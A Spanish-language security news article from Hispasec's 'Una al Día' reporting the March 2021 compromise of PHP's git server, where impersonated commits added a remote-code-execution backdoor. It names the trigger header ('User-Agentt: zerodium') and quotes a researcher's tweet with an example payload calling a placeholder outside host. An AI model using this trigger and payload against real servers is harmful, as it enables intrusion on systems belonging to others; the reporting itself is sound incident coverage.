• Saltar al contenido principal
  • Saltar a la barra lateral principal
  • Saltar al pie de página

Una al Día

Boletín de noticias de Seguridad Informática ofrecido por Hispasec

Usted está aquí: Inicio / General / Detectada una puerta trasera en el repositorio oficial de PHP

Detectada una puerta trasera en el repositorio oficial de PHP

30 marzo, 2021 Por Javier Aranda Deja un comentario

El repositorio oficial de Git de PHP ha sufrido un ataque en la cadena de suministro del software que permitiría la ejecución remota de código mediante una cabecera HTTP especial.

El pasado 28 de marzo, saltó la alarma en el equipo de desarrollo de PHP al ver que dos confirmaciones en el código fuente (o commits) del repositorio php-src incluían código malicioso.

Los atacantes firmaron dichos commits haciéndose pasar por miembros conocidos del proyecto, Rasmus Lerdorf (creador del lenguaje) y Nikita Popov (desarrollador en la empresa Jetbrains). Dichos indicios llevan a pensar que el servidor Git de PHP podría haber sido vulnerado.

El commit malicioso, aparentemente firmado por Rasmus Lerdorf, parecía indicar que realizaba una corrección tipográfica, una práctica habitual y rutinaria en el mantenimiento de software y que a priori no levanta sospechas ya que es un cambio que no debería tener impacto en el comportamiento del lenguaje; pero al revisarlo se ve que que el fichero actualizado habilitaría la ejecución arbitraria de código remoto si el valor de la cabecera HTTP “User-Agentt” (con doble -t al final) comenzaba con “zerodium”.

Commit de código malicioso, aparentemente firmada por Rasmus Lerdorf. Fuente

Posteriormente este commit fue revertido por Nikita Popov (@nikic), pero horas más tarde el código volvía a actualizarse deshaciendo este último cambio y restaurando el código troyanizado. En este caso la firma suplantaba al propio Popov.

Un aspecto llamativo que se puede apreciar es la mención a Zerodium en la función zend_eval_string. Zerodium es una plataforma de compra de exploits y vulnerabilidades de la que ya hemos hablado en anteriores una-al-dia. Sin embargo; actualmente no hay evidencia de que la empresa esté involucrada en este incidente. A este respecto se ha pronunciado en redes sociales Chaouki Bekrar, CEO de Zerodium, para negar dicha relación.

Cheers to the troll who put "Zerodium" in today's PHP git compromised commits. Obviously, we have nothing to do with this.

Likely, the researcher(s) who found this bug/exploit tried to sell it to many entities but none wanted to buy this crap, so they burned it for fun 😃

— Chaouki Bekrar (@cBekrar) March 29, 2021

Otros investigadores han comprobado el comportamiento explotable de esta puerta trasera y mencionan posibles riesgos:

Confirmed, it works. So if someone wants to scan the planet you just need to add this HTTP header:
User-Agentt:zerodium<code>

<code> can be something like file_get_contents("https://yourhostname/someonegotthewrongpatch.lol&quot;); https://t.co/9fBTPZQLAV

— x0rz (@x0rz) March 29, 2021

Para tomar perspectiva sobre el impacto que tendría una puerta trasera de estas características, hay que considerar que PHP es el lenguaje que utiliza en torno al 79% del total de sitios que visitamos. De este porcentaje, el uso de PHP 8 es actualmente ínfimo ya que la versión 8.0 (0.1%) fue publicada en noviembre de 2020. Las versiones 7 (63.6%) y 5 (36%) son a día de hoy las más utilizadas con amplia diferencia.

Distribución del uso de PHP. Fuente

Popov ha publicado una nota informando de que han trasladado su actividad al repositorio de PHP en GitHub, que anteriormente simplemente servía de mirror. De esta manera, solamente usuarios pertenecientes a la organización PHP en GitHub tendrían permisos para actualizar el código de ahora en adelante. En un comunicado a BleepingComputer, Popov añade que estos cambios fueron realizados a la rama de desarrollo de PHP 8.1, cuya fecha de lanzamiento está prevista para final de año; y que los commits maliciosos fueron detectados pocas horas después en una rutina de revisión de código.

Más información:
PHP’s Git server hacked to add backdoors to PHP source code https://www.bleepingcomputer.com/news/security/phps-git-server-hacked-to-add-backdoors-to-php-source-code/
PHP’s Git Server Hacked to Insert Secret Backdoor to Its Source code https://thehackernews.com/2021/03/phps-git-server-hacked-to-insert-secret.html

Compártelo:

  • Twitter
  • Facebook
  • LinkedIn
  • Reddit
  • Telegram
  • WhatsApp

Publicaciones relacionadas

Libros recomendados

Machine Learning aplicado a Ciberseguridad

Hacking redes WiFi

Hacking de dispositivos iOS

Publicado en: General, Vulnerabilidades Etiquetado como: git, PHP, php8, supply chain

Interacciones con los lectores

Deja una respuesta Cancelar la respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.

Barra lateral principal

Buscador

Email Newsletter

Suscríbase y reciba Una al Día en su correo.

UADCAST

Populares de UAD

  • Troyano bancario Coper afecta a nuevas entidades alrededor del mundo.
  • La Europol detiene a una banda responsable de robar millones a través de ataques phishing.
  • Un contratista municipal sale de copas después del trabajo y pierde un pendrive con datos personales de casi medio millón de residentes
  • NSO Group confirma que el software espía Pegasus ha sido utilizado por al menos 5 países europeos
  • La estafa del “Servicio de Verificación DHL”

Entradas recientes

  • La Europol detiene a una banda responsable de robar millones a través de ataques phishing.
  • Troyano bancario Coper afecta a nuevas entidades alrededor del mundo.
  • Un contratista municipal sale de copas después del trabajo y pierde un pendrive con datos personales de casi medio millón de residentes
  • NSO Group confirma que el software espía Pegasus ha sido utilizado por al menos 5 países europeos
  • El Bridge Horizon de Harmony Protocol, sufre un robo de 100 Millones de dólares
  • Microsoft Defender de Windows ya está disponible para Android e iOS
  • DFSCoerce : NTLM Relay en MS-DFSNM
  • Correo electrónico
  • Facebook
  • LinkedIn
  • RSS
  • Twitter

Footer

Una al Día

Una Al Día nació a raíz de un inocente comentario en un canal IRC hace casi 19 años. A través de los archivos, un lector curioso puede ver cómo ha cambiado (o no) la seguridad de la información desde entonces.

Entradas recientes

  • La Europol detiene a una banda responsable de robar millones a través de ataques phishing.
  • Troyano bancario Coper afecta a nuevas entidades alrededor del mundo.
  • Un contratista municipal sale de copas después del trabajo y pierde un pendrive con datos personales de casi medio millón de residentes
  • NSO Group confirma que el software espía Pegasus ha sido utilizado por al menos 5 países europeos
  • El Bridge Horizon de Harmony Protocol, sufre un robo de 100 Millones de dólares

Etiquetas

0-day Android Apple Chrome Ciberataque cve D-Link Facebook Google iOS leak linux malware Microsoft Mozilla OpenSSL Oracle OS X Phishing PHP ransomware rce vulnerabilidad vulnerabilidades Windows WordPress

Copyright © 2022 · Hispasec

 

Cargando comentarios...